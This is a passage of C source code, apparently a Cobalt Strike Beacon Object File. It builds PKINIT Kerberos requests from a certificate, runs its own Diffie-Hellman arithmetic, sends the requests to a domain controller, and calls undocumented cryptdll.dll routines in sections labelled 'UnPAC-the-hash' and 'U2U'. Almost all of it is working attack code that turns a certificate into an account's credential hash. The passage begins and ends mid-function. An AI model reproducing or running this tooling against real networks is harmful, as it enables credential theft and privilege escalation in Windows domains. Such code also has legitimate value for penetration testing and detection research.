BYTE* etype3 = BuildInteger(ETYPE_RC4_HMAC, &etypeLen);
memcpy(etypesContent + etypesContentLen, etype3, etypeLen);
etypesContentLen += etypeLen;
free(etype3);
int etypesSeqLen;
BYTE* etypesSeq = BuildSequence(etypesContent, etypesContentLen, &etypesSeqLen);
int etypesTagLen;
BYTE* etypesTag = BuildContextTag(8, etypesSeq, etypesSeqLen, &etypesTagLen);
memcpy(content + offset, etypesTag, etypesTagLen);
offset += etypesTagLen;
free(etypesSeq);
free(etypesTag);
BYTE* result = BuildSequence(content, offset, outLen);
free(content);
return result;
}
/*
* =============================================================================
* BigInteger Implementation for DH (1024-bit MODP Group 2)
* =============================================================================
*/
#define BIGINT_WORDS 64 /* 64 x 32-bit = 2048 bits max (for intermediate results) */
#define DH_BYTES 128 /* 1024 bits */
#define DH_WORDS 32 /* 32 x 32-bit words */
typedef struct {
DWORD words[BIGINT_WORDS]; /* Little-endian word array */
int len; /* Number of significant words */
} BigInt;
/* Initialize BigInt to zero */
static void bigint_zero(BigInt* n) {
memset(n->words, 0, sizeof(n->words));
n->len = 1;
}
/* Initialize BigInt from big-endian byte array */
static void bigint_from_bytes(BigInt* n, const BYTE* data, int dataLen) {
int i, j;
bigint_zero(n);
/* Convert big-endian bytes to little-endian words */
for (i = 0; i < dataLen && i < DH_BYTES; i++) {
int bytePos = dataLen - 1 - i;
int wordIdx = i / 4;
int byteIdx = i % 4;
n->words[wordIdx] |= ((DWORD)data[bytePos]) << (byteIdx * 8);
}
/* Calculate actual length */
n->len = (dataLen + 3) / 4;
while (n->len > 1 && n->words[n->len - 1] == 0) n->len--;
}
/* Convert BigInt to big-endian byte array */
static void bigint_to_bytes(BigInt* n, BYTE* out, int outLen) {
int i;
memset(out, 0, outLen);
for (i = 0; i < outLen && i < n->len * 4; i++) {
int wordIdx = i / 4;
int byteIdx = i % 4;
out[outLen - 1 - i] = (BYTE)(n->words[wordIdx] >> (byteIdx * 8));
}
}
/* Compare: returns -1 if a < b, 0 if a == b, 1 if a > b */
static int bigint_cmp(BigInt* a, BigInt* b) {
int i;
int maxLen = (a->len > b->len) ? a->len : b->len;
for (i = maxLen - 1; i >= 0; i--) {
DWORD aw = (i < a->len) ? a->words[i] : 0;
DWORD bw = (i < b->len) ? b->words[i] : 0;
if (aw > bw) return 1;
if (aw < bw) return -1;
}
return 0;
}
/* Subtraction: result = a - b (assumes a >= b) */
static void bigint_sub(BigInt* result, BigInt* a, BigInt* b) {
int i;
LONGLONG borrow = 0;
for (i = 0; i < a->len; i++) {
LONGLONG diff = (LONGLONG)a->words[i] - borrow;
if (i < b->len) diff -= b->words[i];
if (diff < 0) {
diff += 0x100000000LL;
borrow = 1;
} else {
borrow = 0;
}
result->words[i] = (DWORD)diff;
}
result->len = a->len;
while (result->len > 1 && result->words[result->len - 1] == 0) result->len--;
}
/* Multiplication: result = a * b */
static void bigint_mul(BigInt* result, BigInt* a, BigInt* b) {
int i, j;
BigInt temp;
bigint_zero(&temp);
for (i = 0; i < a->len; i++) {
ULONGLONG carry = 0;
for (j = 0; j < b->len || carry; j++) {
ULONGLONG prod = temp.words[i + j] + carry;
if (j < b->len) prod += (ULONGLONG)a->words[i] * b->words[j];
temp.words[i + j] = (DWORD)prod;
carry = prod >> 32;
}
if (i + j > temp.len) temp.len = i + j;
}
while (temp.len > 1 && temp.words[temp.len - 1] == 0) temp.len--;
memcpy(result, &temp, sizeof(BigInt));
}
/* Get bit at position */
static int bigint_get_bit(BigInt* n, int pos) {
int wordIdx = pos / 32;
int bitIdx = pos % 32;
if (wordIdx >= n->len) return 0;
return (n->words[wordIdx] >> bitIdx) & 1;
}
/* Get number of significant bits */
static int bigint_bit_length(BigInt* n) {
int i;
if (n->len == 0) return 0;
DWORD top = n->words[n->len - 1];
int bits = (n->len - 1) * 32;
while (top) {
bits++;
top >>= 1;
}
return bits;
}
/* Modulo: result = a mod p (using repeated subtraction for simplicity) */
static void bigint_mod(BigInt* result, BigInt* a, BigInt* p) {
BigInt temp, shifted_p;
int shift;
memcpy(&temp, a, sizeof(BigInt));
/* Simple division by repeated subtraction with shifting */
while (bigint_cmp(&temp, p) >= 0) {
/* Find how much to shift p */
int tempBits = bigint_bit_length(&temp);
int pBits = bigint_bit_length(p);
shift = tempBits - pBits;
/* Shift p left */
memcpy(&shifted_p, p, sizeof(BigInt));
if (shift > 0) {
int wordShift = shift / 32;
int bitShift = shift % 32;
int i;
/* Shift by words */
if (wordShift > 0) {
for (i = shifted_p.len - 1; i >= 0; i--) {
if (i + wordShift < BIGINT_WORDS) {
shifted_p.words[i + wordShift] = shifted_p.words[i];
}
shifted_p.words[i] = 0;
}
shifted_p.len += wordShift;
}
/* Shift by bits */
if (bitShift > 0) {
DWORD carry = 0;
for (i = 0; i < shifted_p.len; i++) {
DWORD newCarry = shifted_p.words[i] >> (32 - bitShift);
shifted_p.words[i] = (shifted_p.words[i] << bitShift) | carry;
carry = newCarry;
}
if (carry) {
shifted_p.words[shifted_p.len++] = carry;
}
}
}
/* If shifted_p > temp, reduce shift by 1 */
if (bigint_cmp(&shifted_p, &temp) > 0) {
/* Shift right by 1 bit */
int i;
for (i = 0; i < shifted_p.len; i++) {
shifted_p.words[i] >>= 1;
if (i + 1 < shifted_p.len) {
shifted_p.words[i] |= (shifted_p.words[i + 1] & 1) << 31;
}
}
while (shifted_p.len > 1 && shifted_p.words[shifted_p.len - 1] == 0) {
shifted_p.len--;
}
}
/* Subtract */
if (bigint_cmp(&temp, &shifted_p) >= 0) {
bigint_sub(&temp, &temp, &shifted_p);
} else {
break;
}
}
memcpy(result, &temp, sizeof(BigInt));
}
/* Modular exponentiation: result = base^exp mod p (square-and-multiply) */
static void bigint_modpow(BigInt* result, BigInt* base, BigInt* exp, BigInt* p) {
BigInt temp_result, temp_base, temp_mul;
int i, expBits;
/* result = 1 */
bigint_zero(&temp_result);
temp_result.words[0] = 1;
temp_result.len = 1;
/* temp_base = base mod p */
bigint_mod(&temp_base, base, p);
expBits = bigint_bit_length(exp);
for (i = 0; i < expBits; i++) {
if (bigint_get_bit(exp, i)) {
/* result = (result * temp_base) mod p */
bigint_mul(&temp_mul, &temp_result, &temp_base);
bigint_mod(&temp_result, &temp_mul, p);
}
/* temp_base = (temp_base * temp_base) mod p */
bigint_mul(&temp_mul, &temp_base, &temp_base);
bigint_mod(&temp_base, &temp_mul, p);
}
memcpy(result, &temp_result, sizeof(BigInt));
}
/*
* =============================================================================
* PKINIT - DH Key Generation (using BigInteger)
* =============================================================================
*/
static void GenerateDHKeys(HCRYPTPROV hProv) {
BigInt p, g, x, y;
/* Generate random private key x (128 bytes) */
CryptGenRandom(hProv, sizeof(g_dhPrivateKey), g_dhPrivateKey);
g_dhPrivateKey[0] &= 0x7F; /* Ensure positive */
/* Initialize BigInts */
bigint_from_bytes(&p, DH_P_MODP2, sizeof(DH_P_MODP2));
bigint_from_bytes(&g, DH_G_MODP2, sizeof(DH_G_MODP2));
bigint_from_bytes(&x, g_dhPrivateKey, sizeof(g_dhPrivateKey));
/* Calculate public key: y = g^x mod p */
bigint_modpow(&y, &g, &x, &p);
/* Convert back to bytes */
bigint_to_bytes(&y, g_dhPublicKey, sizeof(g_dhPublicKey));
}
/* Build DH SubjectPublicKeyInfo */
static BYTE* BuildDhSubjectPublicKeyInfo(int* outLen) {
BYTE* content = (BYTE*)malloc(1024);
BYTE* domainParamsContent = (BYTE*)malloc(256);
BYTE* algIdContent = (BYTE*)malloc(512);
int offset = 0;
/* AlgorithmIdentifier for DH */
/* OID: 1.2.840.10046.2.1 (dhpublicnumber) */
BYTE dhOid[] = { 0x06, 0x07, 0x2A, 0x86, 0x48, 0xCE, 0x3E, 0x02, 0x01 };
/* DomainParameters: SEQUENCE { p INTEGER, g INTEGER } */
int pIntLen;
BYTE* pInt = BuildIntegerFromBytes((BYTE*)DH_P_MODP2, sizeof(DH_P_MODP2), &pIntLen);
int gIntLen;
BYTE* gInt = BuildIntegerFromBytes((BYTE*)DH_G_MODP2, sizeof(DH_G_MODP2), &gIntLen);
memcpy(domainParamsContent, pInt, pIntLen);
memcpy(domainParamsContent + pIntLen, gInt, gIntLen);
int domainParamsLen;
BYTE* domainParams = BuildSequence(domainParamsContent, pIntLen + gIntLen, &domainParamsLen);
free(pInt);
free(gInt);
/* Build AlgorithmIdentifier SEQUENCE */
memcpy(algIdContent, dhOid, sizeof(dhOid));
memcpy(algIdContent + sizeof(dhOid), domainParams, domainParamsLen);
int algIdLen;
BYTE* algId = BuildSequence(algIdContent, sizeof(dhOid) + domainParamsLen, &algIdLen);
free(domainParams);
memcpy(content + offset, algId, algIdLen);
offset += algIdLen;
free(algId);
/* BIT STRING containing public key INTEGER */
int pubKeyIntLen;
BYTE* pubKeyInt = BuildIntegerFromBytes(g_dhPublicKey, sizeof(g_dhPublicKey), &pubKeyIntLen);
int pubKeyBitLen;
BYTE* pubKeyBit = BuildBitString(pubKeyInt, pubKeyIntLen, &pubKeyBitLen);
free(pubKeyInt);
memcpy(content + offset, pubKeyBit, pubKeyBitLen);
offset += pubKeyBitLen;
free(pubKeyBit);
free(domainParamsContent);
free(algIdContent);
BYTE* result = BuildSequence(content, offset, outLen);
free(content);
return result;
}
/*
* =============================================================================
* PKINIT - AuthPack Construction
* =============================================================================
*/
static BYTE* BuildPKAuthenticator(const char* user, const char* realm,
BYTE* paChecksum, int paChecksumLen, int* outLen) {
BYTE* content = (BYTE*)malloc(512);
int offset = 0;
/* cusec [0] INTEGER (microseconds) */
SYSTEMTIME st;
GetSystemTime(&st);
int cusec = st.wMilliseconds * 1000;
int cusecLen;
BYTE* cusecInt = BuildInteger(cusec, &cusecLen);
int cusecTagLen;
BYTE* cusecTag = BuildContextTag(0, cusecInt, cusecLen, &cusecTagLen);
memcpy(content + offset, cusecTag, cusecTagLen);
offset += cusecTagLen;
free(cusecInt);
free(cusecTag);
/* ctime [1] KerberosTime */
char ctime[20];
sprintf(ctime, "%04d%02d%02d%02d%02d%02dZ",
st.wYear, st.wMonth, st.wDay, st.wHour, st.wMinute, st.wSecond);
int ctimeStrLen;
BYTE* ctimeStr = BuildGeneralizedTime(ctime, &ctimeStrLen);
int ctimeTagLen;
BYTE* ctimeTag = BuildContextTag(1, ctimeStr, ctimeStrLen, &ctimeTagLen);
memcpy(content + offset, ctimeTag, ctimeTagLen);
offset += ctimeTagLen;
free(ctimeStr);
free(ctimeTag);
/* nonce [2] INTEGER */
int nonceLen;
BYTE* nonceInt = BuildInteger(g_nonce, &nonceLen);
int nonceTagLen;
BYTE* nonceTag = BuildContextTag(2, nonceInt, nonceLen, &nonceTagLen);
memcpy(content + offset, nonceTag, nonceTagLen);
offset += nonceTagLen;
free(nonceInt);
free(nonceTag);
/* paChecksum [3] OCTET STRING (SHA-1 of req-body) */
if (paChecksum != NULL && paChecksumLen > 0) {
int checksumOctetLen;
BYTE* checksumOctet = BuildOctetString(paChecksum, paChecksumLen, &checksumOctetLen);
int checksumTagLen;
BYTE* checksumTag = BuildContextTag(3, checksumOctet, checksumOctetLen, &checksumTagLen);
memcpy(content + offset, checksumTag, checksumTagLen);
offset += checksumTagLen;
free(checksumOctet);
free(checksumTag);
}
BYTE* result = BuildSequence(content, offset, outLen);
free(content);
return result;
}
static BYTE* BuildAuthPack(const char* user, const char* realm,
BYTE* paChecksum, int paChecksumLen, int* outLen) {
BYTE* content = (BYTE*)malloc(2048);
int offset = 0;
/* pkAuthenticator [0] PKAuthenticator */
int pkAuthLen;
BYTE* pkAuth = BuildPKAuthenticator(user, realm, paChecksum, paChecksumLen, &pkAuthLen);
int pkAuthTagLen;
BYTE* pkAuthTag = BuildContextTag(0, pkAuth, pkAuthLen, &pkAuthTagLen);
memcpy(content + offset, pkAuthTag, pkAuthTagLen);
offset += pkAuthTagLen;
free(pkAuth);
free(pkAuthTag);
/* clientPublicValue [1] SubjectPublicKeyInfo (for DH) */
int dhPubKeyInfoLen;
BYTE* dhPubKeyInfo = BuildDhSubjectPublicKeyInfo(&dhPubKeyInfoLen);
int dhPubKeyTagLen;
BYTE* dhPubKeyTag = BuildContextTag(1, dhPubKeyInfo, dhPubKeyInfoLen, &dhPubKeyTagLen);
memcpy(content + offset, dhPubKeyTag, dhPubKeyTagLen);
offset += dhPubKeyTagLen;
free(dhPubKeyInfo);
free(dhPubKeyTag);
BYTE* result = BuildSequence(content, offset, outLen);
free(content);
return result;
}
/*
* =============================================================================
* PKINIT - CMS SignedData Construction
* =============================================================================
*/
static BYTE* BuildCmsSignedData(PCCERT_CONTEXT pCert, BYTE* content, int contentLen, int* outLen) {
/*
* Build CMS SignedData using Windows CryptoMsg API
* Uses CryptMsgOpenToEncode with id-pkinit-authData OID
*/
#define szOID_PKINIT_AUTHDATA_STR "1.3.6.1.5.2.3.1"
HCRYPTPROV hProv = 0;
DWORD keySpec = 0;
BOOL fCallerFree = FALSE;
HCRYPTMSG hMsg = NULL;
BYTE* signedMsg = NULL;
DWORD signedMsgLen = 0;
CMSG_SIGNER_ENCODE_INFO signerInfo;
CMSG_SIGNED_ENCODE_INFO signedInfo;
CERT_BLOB certBlob;
*outLen = 0;
if (!CryptAcquireCertificatePrivateKey(pCert, 0, NULL, &hProv, &keySpec, &fCallerFree)) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to acquire private key: 0x%08X", GetLastError());
return NULL;
}
memset(&signerInfo, 0, sizeof(signerInfo));
signerInfo.cbSize = sizeof(signerInfo);
signerInfo.pCertInfo = pCert->pCertInfo;
signerInfo.hCryptProv = hProv;
signerInfo.dwKeySpec = keySpec;
signerInfo.HashAlgorithm.pszObjId = (LPSTR)szOID_RSA_SHA1RSA;
certBlob.cbData = pCert->cbCertEncoded;
certBlob.pbData = pCert->pbCertEncoded;
memset(&signedInfo, 0, sizeof(signedInfo));
signedInfo.cbSize = sizeof(signedInfo);
signedInfo.cSigners = 1;
signedInfo.rgSigners = &signerInfo;
signedInfo.cCertEncoded = 1;
signedInfo.rgCertEncoded = &certBlob;
hMsg = CryptMsgOpenToEncode(
PKCS_7_ASN_ENCODING | X509_ASN_ENCODING,
0,
CMSG_SIGNED,
&signedInfo,
szOID_PKINIT_AUTHDATA_STR,
NULL
);
if (!hMsg) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] CryptMsgOpenToEncode failed: 0x%08X", GetLastError());
goto cleanup;
}
if (!CryptMsgUpdate(hMsg, content, contentLen, TRUE)) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] CryptMsgUpdate failed: 0x%08X", GetLastError());
goto cleanup;
}
if (!CryptMsgGetParam(hMsg, CMSG_CONTENT_PARAM, 0, NULL, &signedMsgLen)) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] CryptMsgGetParam size failed: 0x%08X", GetLastError());
goto cleanup;
}
signedMsg = (BYTE*)malloc(signedMsgLen);
if (!CryptMsgGetParam(hMsg, CMSG_CONTENT_PARAM, 0, signedMsg, &signedMsgLen)) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] CryptMsgGetParam failed: 0x%08X", GetLastError());
free(signedMsg);
signedMsg = NULL;
goto cleanup;
}
*outLen = signedMsgLen;
cleanup:
if (hMsg) CryptMsgClose(hMsg);
if (fCallerFree && hProv) CryptReleaseContext(hProv, 0);
return signedMsg;
}
/*
* =============================================================================
* PKINIT - PA-PK-AS-REQ Construction
* =============================================================================
*/
static BYTE* BuildPaPkAsReq(PCCERT_CONTEXT pCert, BYTE* authPack, int authPackLen, int* outLen) {
/* Build CMS SignedData containing AuthPack */
int signedDataLen;
BYTE* signedData = BuildCmsSignedData(pCert, authPack, authPackLen, &signedDataLen);
if (signedData == NULL) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to build CMS SignedData");
return NULL;
}
/* PA-PK-AS-REQ ::= SEQUENCE {
* signedAuthPack [0] IMPLICIT OCTET STRING
* }
*/
BYTE* content = (BYTE*)malloc(8192);
int offset = 0;
/* [0] IMPLICIT - use context tag 0x80 for primitive or 0xA0 for constructed */
content[offset++] = 0x80; /* [0] IMPLICIT primitive */
int lenSize = EncodeLength(content + offset, signedDataLen);
offset += lenSize;
memcpy(content + offset, signedData, signedDataLen);
offset += signedDataLen;
free(signedData);
BYTE* result = BuildSequence(content, offset, outLen);
free(content);
return result;
}
/*
* =============================================================================
* PKINIT - Full AS-REQ Construction
* =============================================================================
*/
static BYTE* BuildPkinitAsReq(PCCERT_CONTEXT pCert, const char* user, const char* domain, int* outLen) {
char* realm = (char*)malloc(256);
BYTE* padataContent = (BYTE*)malloc(8192);
BYTE* asReqContent = (BYTE*)malloc(16384);
BYTE* result = NULL;
int i;
/* Convert domain to uppercase for realm */
for (i = 0; domain[i] && i < 255; i++) {
realm[i] = (domain[i] >= 'a' && domain[i] <= 'z') ? domain[i] - 32 : domain[i];
}
realm[i] = '\0';
/* Build req-body first (needed for paChecksum) */
int reqBodyLen;
BYTE* reqBody = BuildKdcReqBody(user, realm, &reqBodyLen);
/* Calculate SHA-1 of req-body for paChecksum */
HCRYPTPROV hProv;
HCRYPTHASH hHash;
BYTE paChecksum[20];
DWORD hashLen = 20;
if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] CryptAcquireContext failed");
free(reqBody);
goto cleanup;
}
/* Generate DH keys */
GenerateDHKeys(hProv);
CryptCreateHash(hProv, CALG_SHA1, 0, 0, &hHash);
CryptHashData(hHash, reqBody, reqBodyLen, 0);
CryptGetHashParam(hHash, HP_HASHVAL, paChecksum, &hashLen, 0);
CryptDestroyHash(hHash);
CryptReleaseContext(hProv, 0);
/* Build AuthPack */
int authPackLen;
BYTE* authPack = BuildAuthPack(user, realm, paChecksum, 20, &authPackLen);
/* Build PA-PK-AS-REQ */
int paPkAsReqLen;
BYTE* paPkAsReq = BuildPaPkAsReq(pCert, authPack, authPackLen, &paPkAsReqLen);
free(authPack);
if (paPkAsReq == NULL) {
free(reqBody);
goto cleanup;
}
/* Build PA-DATA for PKINIT */
int padataOffset = 0;
/* padata-type [1] INTEGER (16 = PA-PK-AS-REQ) */
int paTypeLen;
BYTE* paTypeInt = BuildInteger(PA_PK_AS_REQ, &paTypeLen);
int paTypeTagLen;
BYTE* paTypeTag = BuildContextTag(1, paTypeInt, paTypeLen, &paTypeTagLen);
memcpy(padataContent + padataOffset, paTypeTag, paTypeTagLen);
padataOffset += paTypeTagLen;
free(paTypeInt);
free(paTypeTag);
/* padata-value [2] OCTET STRING */
int paValueOctetLen;
BYTE* paValueOctet = BuildOctetString(paPkAsReq, paPkAsReqLen, &paValueOctetLen);
int paValueTagLen;
BYTE* paValueTag = BuildContextTag(2, paValueOctet, paValueOctetLen, &paValueTagLen);
memcpy(padataContent + padataOffset, paValueTag, paValueTagLen);
padataOffset += paValueTagLen;
free(paValueOctet);
free(paValueTag);
free(paPkAsReq);
int padataSeqLen;
BYTE* padataSeq = BuildSequence(padataContent, padataOffset, &padataSeqLen);
/* Build AS-REQ */
int asReqOffset = 0;
/* pvno [1] INTEGER (5) */
int pvnoLen;
BYTE* pvnoInt = BuildInteger(5, &pvnoLen);
int pvnoTagLen;
BYTE* pvnoTag = BuildContextTag(1, pvnoInt, pvnoLen, &pvnoTagLen);
memcpy(asReqContent + asReqOffset, pvnoTag, pvnoTagLen);
asReqOffset += pvnoTagLen;
free(pvnoInt);
free(pvnoTag);
/* msg-type [2] INTEGER (10 = AS-REQ) */
int msgTypeLen;
BYTE* msgTypeInt = BuildInteger(KRB_AS_REQ, &msgTypeLen);
int msgTypeTagLen;
BYTE* msgTypeTag = BuildContextTag(2, msgTypeInt, msgTypeLen, &msgTypeTagLen);
memcpy(asReqContent + asReqOffset, msgTypeTag, msgTypeTagLen);
asReqOffset += msgTypeTagLen;
free(msgTypeInt);
free(msgTypeTag);
/* padata [3] SEQUENCE OF PA-DATA */
int padataOuterSeqLen;
BYTE* padataOuterSeq = BuildSequence(padataSeq, padataSeqLen, &padataOuterSeqLen);
int padataOuterTagLen;
BYTE* padataOuterTag = BuildContextTag(3, padataOuterSeq, padataOuterSeqLen, &padataOuterTagLen);
memcpy(asReqContent + asReqOffset, padataOuterTag, padataOuterTagLen);
asReqOffset += padataOuterTagLen;
free(padataSeq);
free(padataOuterSeq);
free(padataOuterTag);
/* req-body [4] KDC-REQ-BODY */
int reqBodyTagLen;
BYTE* reqBodyTag = BuildContextTag(4, reqBody, reqBodyLen, &reqBodyTagLen);
memcpy(asReqContent + asReqOffset, reqBodyTag, reqBodyTagLen);
asReqOffset += reqBodyTagLen;
free(reqBody);
free(reqBodyTag);
/* Wrap in SEQUENCE */
int asReqSeqLen;
BYTE* asReqSeq = BuildSequence(asReqContent, asReqOffset, &asReqSeqLen);
/* Wrap in APPLICATION 10 (AS-REQ) */
result = BuildApplication(KRB_AS_REQ, asReqSeq, asReqSeqLen, outLen);
free(asReqSeq);
cleanup:
free(realm);
free(padataContent);
free(asReqContent);
return result;
}
/*
* =============================================================================
* Network - Send to KDC
* =============================================================================
*/
static BYTE* SendToKdc(const char* kdcHost, int port, BYTE* data, int dataLen, int* respLen) {
WSADATA wsaData;
SOCKET sock = INVALID_SOCKET;
struct sockaddr_in server;
struct hostent* host;
BYTE* response = NULL;
BYTE lengthPrefix[4];
DWORD totalLen;
if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] WSAStartup failed");
return NULL;
}
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock == INVALID_SOCKET) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Socket creation failed");
WSACleanup();
return NULL;
}
/* Resolve hostname */
host = gethostbyname(kdcHost);
if (!host) {
server.sin_addr.s_addr = inet_addr(kdcHost);
if (server.sin_addr.s_addr == INADDR_NONE) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to resolve %s", kdcHost);
closesocket(sock);
WSACleanup();
return NULL;
}
} else {
memcpy(&server.sin_addr, host->h_addr_list[0], host->h_length);
}
server.sin_family = AF_INET;
server.sin_port = htons((unsigned short)port);
if (connect(sock, (struct sockaddr*)&server, sizeof(server)) < 0) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Connection failed");
closesocket(sock);
WSACleanup();
return NULL;
}
/* Send with 4-byte length prefix (big-endian) */
totalLen = htonl(dataLen);
memcpy(lengthPrefix, &totalLen, 4);
send(sock, (char*)lengthPrefix, 4, 0);
send(sock, (char*)data, dataLen, 0);
/* Receive response length */
if (recv(sock, (char*)lengthPrefix, 4, 0) != 4) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to receive response length");
closesocket(sock);
WSACleanup();
return NULL;
}
memcpy(&totalLen, lengthPrefix, 4);
*respLen = ntohl(totalLen);
if (*respLen <= 0 || *respLen > 100000) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Invalid response length: %d", *respLen);
closesocket(sock);
WSACleanup();
return NULL;
}
/* Receive response */
response = (BYTE*)malloc(*respLen);
int received = 0;
while (received < *respLen) {
int r = recv(sock, (char*)response + received, *respLen - received, 0);
if (r <= 0) break;
received += r;
}
closesocket(sock);
WSACleanup();
return response;
}
/*
* =============================================================================
* UnPAC-the-hash - Kerberos Decryption
* =============================================================================
*/
static BYTE* KerberosDecrypt(int eType, int keyUsage, BYTE* key, int keyLen,
BYTE* data, int dataLen, int* outLen) {
HMODULE hCryptDll = NULL;
CDLocateCSystem_t pCDLocateCSystem = NULL;
KERB_ECRYPT* pCSystem = NULL;
void* pContext = NULL;
BYTE* output = NULL;
int status;
hCryptDll = LoadLibraryA("cryptdll.dll");
if (!hCryptDll) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to load cryptdll.dll");
return NULL;
}
pCDLocateCSystem = (CDLocateCSystem_t)GetProcAddress(hCryptDll, "CDLocateCSystem");
if (!pCDLocateCSystem) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to find CDLocateCSystem");
FreeLibrary(hCryptDll);
return NULL;
}
status = pCDLocateCSystem(eType, (void**)&pCSystem);
if (status != 0 || !pCSystem) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] CDLocateCSystem failed: 0x%X", status);
FreeLibrary(hCryptDll);
return NULL;
}
/* Get function pointers from KERB_ECRYPT structure */
KERB_ECRYPT_Initialize initFunc = (KERB_ECRYPT_Initialize)pCSystem->Initialize;
KERB_ECRYPT_Decrypt decryptFunc = (KERB_ECRYPT_Decrypt)pCSystem->Decrypt;
KERB_ECRYPT_Finish finishFunc = (KERB_ECRYPT_Finish)pCSystem->Finish;
/* Initialize decryption context */
status = initFunc(key, keyLen, keyUsage, &pContext);
if (status != 0) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Decrypt Initialize failed: 0x%X", status);
FreeLibrary(hCryptDll);
return NULL;
}
/* Calculate output size */
int outputSize = dataLen;
if (dataLen % pCSystem->BlockSize != 0) {
outputSize += pCSystem->BlockSize - (dataLen % pCSystem->BlockSize);
}
outputSize += pCSystem->Size;
output = (BYTE*)malloc(outputSize);
/* Decrypt */
status = decryptFunc(pContext, data, dataLen, output, &outputSize);
finishFunc(&pContext);
if (status != 0) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Decrypt failed: 0x%X", status);
free(output);
FreeLibrary(hCryptDll);
return NULL;
}
*outLen = outputSize;
FreeLibrary(hCryptDll);
return output;
}
/*
* =============================================================================
* U2U - Kerberos Encryption
* =============================================================================
*/
typedef int (WINAPI *KERB_ECRYPT_Encrypt)(void* pContext, BYTE* data, int dataSize, BYTE* output, int* outputSize);
static BYTE* KerberosEncrypt(int eType, int keyUsage, BYTE* key, int keyLen,
BYTE* data, int dataLen, int* outLen) {
HMODULE hCryptDll = NULL;
CDLocateCSystem_t pCDLocateCSystem = NULL;
KERB_ECRYPT* pCSystem = NULL;
void* pContext = NULL;
BYTE* output = NULL;
int status;
hCryptDll = LoadLibraryA("cryptdll.dll");
if (!hCryptDll) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to load cryptdll.dll for encrypt");
return NULL;
}
pCDLocateCSystem = (CDLocateCSystem_t)GetProcAddress(hCryptDll, "CDLocateCSystem");
if (!pCDLocateCSystem) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to find CDLocateCSystem");
FreeLibrary(hCryptDll);
return NULL;
}
status = pCDLocateCSystem(eType, (void**)&pCSystem);
if (status != 0 || !pCSystem) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] CDLocateCSystem failed for encrypt: 0x%X", status);
FreeLibrary(hCryptDll);
return NULL;
}
/* Get function pointers */
KERB_ECRYPT_Initialize initFunc = (KERB_ECRYPT_Initialize)pCSystem->Initialize;
KERB_ECRYPT_Encrypt encryptFunc = (KERB_ECRYPT_Encrypt)pCSystem->Encrypt;
KERB_ECRYPT_Finish finishFunc = (KERB_ECRYPT_Finish)pCSystem->Finish;
/* Initialize encryption context */
status = initFunc(key, keyLen, keyUsage, &pContext);
if (status != 0) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Encrypt Initialize failed: 0x%X", status);
FreeLibrary(hCryptDll);
return NULL;
}
/* Output size = data + checksum + confounder overhead */
int outputSize = dataLen + pCSystem->Size;
output = (BYTE*)malloc(outputSize);
/* Encrypt */
status = encryptFunc(pContext, data, dataLen, output, &outputSize);
finishFunc(&pContext);
if (status != 0) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Encrypt failed: 0x%X", status);
free(output);
FreeLibrary(hCryptDll);
return NULL;
}
*outLen = outputSize;
FreeLibrary(hCryptDll);
return output;
}
/*
* =============================================================================
* U2U - Kerberos Checksum (HMAC-SHA1-96-AES256)
* =============================================================================
*/
typedef struct _KERB_CHECKSUM {
int Type;
int Size;
int Flag;
void* Initialize;
void* Sum;
void* Finalize;
void* Finish;
void* InitializeEx;
void* InitializeEx2;
} KERB_CHECKSUM;
typedef int (WINAPI *KERB_CHECKSUM_InitializeEx)(BYTE* key, int keySize, int keyUsage, void** pContext);
typedef int (WINAPI *KERB_CHECKSUM_Sum)(void* pContext, int dataSize, BYTE* data);
typedef int (WINAPI *KERB_CHECKSUM_Finalize)(void* pContext, BYTE* output);
typedef int (WINAPI *KERB_CHECKSUM_Finish)(void** pContext);
#define KERB_CHECKSUM_HMAC_SHA1_96_AES256 16
static BYTE* ComputeKerberosChecksum(BYTE* key, int keyLen, BYTE* data, int dataLen, int keyUsage, int* checksumLen) {
HMODULE hCryptDll = NULL;
CDLocateCheckSum_t pCDLocateCheckSum = NULL;
KERB_CHECKSUM* pCheckSum = NULL;
void* pContext = NULL;
BYTE* output = NULL;
int status;
hCryptDll = LoadLibraryA("cryptdll.dll");
if (!hCryptDll) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to load cryptdll.dll for checksum");
return NULL;
}
pCDLocateCheckSum = (CDLocateCheckSum_t)GetProcAddress(hCryptDll, "CDLocateCheckSum");
if (!pCDLocateCheckSum) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] Failed to find CDLocateCheckSum");
FreeLibrary(hCryptDll);
return NULL;
}
status = pCDLocateCheckSum(KERB_CHECKSUM_HMAC_SHA1_96_AES256, (void**)&pCheckSum);
if (status != 0 || !pCheckSum) {
BeaconPrintf(CALLBACK_OUTPUT, "[!] CDLocateCheckSum failed: 0x%X", status);
FreeLibrary(hCryptDll);
return NULL;
}
/* Get function pointers */
KERB_CHECKSUM_InitializeEx initExFunc = (KERB_CHECKSUM_InitializeEx)pCheckSum->InitializeEx;
KERB_CHECKSUM_Sum sumFunc = (KERB_CHECKSUM_Sum)pCheckSum->Sum;
